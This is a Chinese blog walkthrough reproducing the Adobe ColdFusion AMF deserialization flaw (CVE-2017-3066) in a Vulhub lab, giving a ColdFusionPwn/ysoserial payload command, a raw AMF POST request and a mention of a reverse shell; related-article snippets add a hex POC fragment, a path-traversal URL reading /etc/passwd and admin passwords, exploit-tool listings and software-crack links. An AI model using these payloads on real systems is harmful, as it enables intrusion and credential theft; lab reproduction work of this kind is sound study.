dobe ColdFusion AMF 反序列化远程命令执行 (CVE-2017-3066)

最新推荐文章于 2024-05-04 13:31:21 发布
最新推荐文章于 2024-05-04 13:31:21 发布
阅读量237 收藏 1
点赞数
文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzz1284/article/details/128549789
版权

漏洞环境均基于Vulhub

介绍

Adobe ColdFusion 是由 JJ Allaire 于 1995 年创建的商业快速 Web 应用程序开发计算平台。

版本

Adobe ColdFusion 2016 Update 3 及更早版本、ColdFusion 11 Update 11 及更早版本、ColdFusion 10 Update 22 及更早版本在 Apache BlazeDS 库中存在 Java 反序列化漏洞。

复现

访问http://216.127.164.238:8500/CFIDE/administrator/index.cfm,初始化

使用ColdFusionPwn生成 POC poc.ser:

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

放进包里的时候一定是放文件,不能复制!

http头

POST http://216.127.164.238:8500/flex2gateway/amf HTTP/1.1
Host: 216.127.164.238:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-amf
Upgrade-Insecure-Requests: 1
Content-Length: 2855

抓包不能只看别人复现,要自己抓个包,看特征改

反弹shell

生成反弹poc,添加到burp

反弹成功

n1ght_X
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
POC - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066
JiangBuLiu的博客
10-16 1378
安装010Editer 下载链接:http://www.pc6.com/softview/SoftView_55129.html 复制POC的十六进制 00 03 00 00 00 01 00 00 00 00 00 00 00 01 11 0A 07 47 6F 72 67 2E 61 70 61 63 68 65 2E 61 78 69 73 32 2E 75 74 69 6C 2E 4D 6...
mac版 dobe cc破解
04-11
mac版 dobe cc破解
CVE-2017-0199.zip
12-13
调试CVE-2017-0199漏洞样本过程中保存的中间文件,有兴趣的同学可以调试试试。强行添加摘要至50字。
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。 具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞,iis服务提权工具。
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066
EC_Carrot的博客
05-20 554
漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 影响范围 Adobe ColdFusion (2016 release) Update 3及之前的版本 ColdFusion 11 Update 11及之前的版本 ColdFus
【vulhub】Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)和CVE-2010-2861文件包含漏洞
qq_45300786的博客
09-13 257
adobe coldfusion特征 1、8500端口 2、如图所示 验证和反弹shell都有 https://idc.wanyunshuju.com/aqld/2076.html
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2017-3066)
利他者利己,利己者无功。利他利己,利己利他。
10-20 3609
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
coldfusion文件读取漏洞(CVE-2010-2861)
1stPeak's Blog
07-28 809
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
dobe.All.Products Keymaker
01-26
dobe.All.Products Keymaker
documents:3dobe 公共文档库
06-30
3dobe 公共文档库 版权声明 本文档库的所有文档版权均归文档原作者所有,请尊重原作者的合法权益。 本文档库文档仅限于3dobe组员内部学习交流使用。 文档列表:
Adobe CS5CleanerTool:Adobe完全卸载工具.docx
09-26
Adobe CS5CleanerTool:Adobe完全卸载工具.docx
Adobe Acrobat9中文版教程之九数字签名
01-07
很详细的教程,一步一步的教会设置数字签名
大模型引领未来:探索其在多个领域的深度应用与无限可能【第七章、大模型在科技、网络安全、农业等方面的应用探索】
今晚打老虎的专栏
05-01 769
大型模型在科技、网络安全和农业领域的应用持续演进。在科技中,它们加速了天文学和科学研究的进展。在网络安全领域,大模型提高了网络威胁检测和应对的效率。而在农业中,它们帮助农民做出精准决策,优化产量和质量。这些应用展示了大模型在不同领域的广泛用途,为各行业带来新的发展机遇。
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1766
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
【网络安全产品】---应用防火墙(WAF)
最新发布
嘿嘿嘿
05-04 468
Web应用防火墙(Web Application FirewallWAF可对网站或者App的业务流量进行恶意特征识别及防护,在对流量清洗和过滤后,将正常、安全的流量返回给服务器,避免网站服务器被恶意入侵导致性能异常等问题,从而保障网站的业务安全和数据安全
匠心精神与创新力量:构筑网络安全的新防线
weixin_51347473的博客
04-30 540
在数字化时代,随着技术的飞速发展,网络安全问题日益凸显,成为全球关注的焦点。2024年哈经开区十大匠心提名之一的亿林网络李璐昆,正是在这样的背景下,以其匠心精神和创新实践,为网络安全领域贡献了重要力量。
A我可以到哪里下载 dobe Illustrator
03-26
您可以在Adobe官方网站上下载Adobe Illustrator,或者通过Adobe Creative Cloud应用程序进行下载和安装。请注意,Adobe Illustrator是一款订阅软件,您需要订阅 Adobe Creative Cloud 才能使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值